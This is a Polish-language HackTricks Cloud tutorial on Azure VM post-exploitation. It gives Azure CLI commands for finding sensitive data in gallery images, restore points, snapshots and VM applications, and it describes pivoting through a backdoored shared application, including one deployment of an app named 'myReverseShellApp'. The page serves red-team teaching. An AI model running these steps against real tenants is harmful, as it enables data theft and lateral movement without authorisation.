Az - VMs & Network Post Exploitation
Tip
Ucz się & ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Wspieraj HackTricks
- Sprawdź subscription plans!
- Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.
VMs & Network
Aby uzyskać więcej informacji na temat Azure VMs i sieci, sprawdź następującą stronę:
Az - Virtual Machines & Network
VM Application Pivoting
Aplikacje VM mogą być udostępniane innym subskrypcjom i najemcom. Jeśli aplikacja jest udostępniana, prawdopodobnie dlatego, że jest używana. Jeśli atakujący zdoła skompromitować aplikację i przesłać wersję z backdoorem, może być możliwe, że zostanie ona wykonana w innym najemcy lub subskrypcji.
Sensitive information in images
Możliwe, że można znaleźć wrażliwe informacje w obrazach zrobionych z VM w przeszłości.
- List images from galleries
# Get galleries
az sig list -o table
# List images inside gallery
az sig image-definition list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
-o table
# Get images versions
az sig image-version list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
--gallery-image-definition <IMAGE_DEFINITION> \
-o table
- Lista niestandardowych obrazów
az image list -o table
- Utwórz VM z identyfikatorem obrazu i przeszukaj go w poszukiwaniu wrażliwych informacji.
# Create VM from image
az vm create \
--resource-group <RESOURCE_GROUP> \
--name <VM_NAME> \
--image /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/galleries/<GALLERY_NAME>/images/<IMAGE_DEFINITION>/versions/<IMAGE_VERSION> \
--admin-username <ADMIN_USERNAME> \
--generate-ssh-keys
Wrażliwe informacje w punktach przywracania
Możliwe jest znalezienie wrażliwych informacji w punktach przywracania.
- Lista punktów przywracania
az restore-point list \
--resource-group <RESOURCE_GROUP> \
--restore-point-collection-name <COLLECTION_NAME> \
-o table
- Utwórz dysk z punktu przywracania
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <NEW_DISK_NAME> \
--source /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/restorePointCollections/<COLLECTION_NAME>/restorePoints/<RESTORE_POINT_NAME>
- Podłącz dysk do VM (atakujący musi już skompromitować VM w obrębie konta)
az vm disk attach \
--resource-group <RESOURCE_GROUP> \
--vm-name <VM_NAME> \
--name <DISK_NAME>
- Zamontuj dysk i przeszukaj w poszukiwaniu wrażliwych informacji
# List all available disks
sudo fdisk -l
# Check disk format
sudo file -s /dev/sdX
# Mount it
sudo mkdir /mnt/mydisk
sudo mount /dev/sdX1 /mnt/mydisk
Wrażliwe informacje na dyskach i migawkach
Możliwe, że można znaleźć wrażliwe informacje wewnątrz dysków lub nawet starych migawek dysków.
- Lista migawek
az snapshot list \
--resource-group <RESOURCE_GROUP> \
-o table
- Utwórz dysk z migawki (jeśli potrzebne)
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <DISK_NAME> \
--source <SNAPSHOT_ID> \
--size-gb <DISK_SIZE>
- Podłącz i zamontuj dysk do VM i przeszukaj w poszukiwaniu wrażliwych informacji (sprawdź poprzednią sekcję, aby zobaczyć, jak to zrobić)
Wrażliwe informacje w rozszerzeniach VM i aplikacjach VM
Możliwe, że można znaleźć wrażliwe informacje wewnątrz rozszerzeń VM i aplikacji VM.
- Wypisz wszystkie aplikacje VM
## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
- Zainstaluj rozszerzenie w VM i wyszukaj wrażliwe informacje
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true
Tip
Ucz się & ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Wspieraj HackTricks
- Sprawdź subscription plans!
- Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.
HackTricks Cloud

